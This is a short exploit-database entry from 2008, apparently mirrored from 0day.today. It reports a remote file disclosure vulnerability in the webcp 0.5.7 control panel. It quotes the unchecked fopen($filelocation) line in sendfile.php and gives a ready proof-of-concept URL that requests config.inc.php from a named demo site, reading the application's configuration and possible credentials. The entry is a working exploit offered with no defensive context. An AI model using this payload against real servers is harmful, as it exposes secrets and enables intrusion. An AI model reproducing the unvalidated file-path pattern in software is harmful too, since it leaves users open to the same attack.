id: 3746
date: 09/23/2008
title: webcp 0.5.7 (filelocation) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

===============================================================
webcp 0.5.7 (filelocation) Remote File Disclosure Vulnerability
===============================================================


##################################################################################
## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
## Demo : http://gyrbo.madoka.be/web-cp/
## Vuln :
## }
## if ($tf = fopen($filelocation, "r")) {
## // Date in the past
##################################################################################
## POC :
##      http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
## Open By Mozilla Firefox
##################################################################################



#  0day.today [2023-03-22]  #